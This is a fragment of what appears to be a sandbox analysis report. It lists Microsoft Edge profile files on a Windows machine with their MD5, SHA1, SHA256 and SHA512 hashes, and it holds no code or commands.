| SHA1 | 878bfcdade43f8848c358f4afaf67f3b109da8a9 |
| SHA256 | 56d2a6446822cc8337da114f5668dfad1efabeb53b0335c2ba5e99aa77bc9db4 |
| SHA512 | 1826f955484b5f6f3e2f606624057964f17108ab3648df7e510d5b05e7fdea6cbaacf826e7917604e338787b56a1b223783fc3ffd6d7dea30cfd5206e44338b6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 353181bedb842eee65507c848760ca6a |
| SHA1 | 456f11c94d4fee505fdcfa221e7c8412e2672d38 |
| SHA256 | 205405b79f4d975a7fbc0080da57797dc136b3fe7165dbb6904995bd0ff9c9fe |
| SHA512 | 5a4c6c12ac3e179610f28d44aaf8bb2e9d83d674db2740940609b832113438bb39b70ed6e81f96cccfbad924459fb8e1228eea3811799cdc5720a7f9d1cd7eb1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e2508b88a180310e89c4d6dc6fafc6a0 |
| SHA1 | 120cd01e31c9daa3f4370c037833ba5ccf3c5b5d |
| SHA256 | 4cd61fea979dc26ee02dfcccb167f61ef020278d508c4d9c381c0789b188ecf7 |
| SHA512 | 5ee244dd01c62993c7d37b5da5343f2b32918cd42984a45160b1fcdb60d260c6b0f98dce45ac9af478be990cbe03e196d6b3601fcbd2a9a831a9f047a9744125 |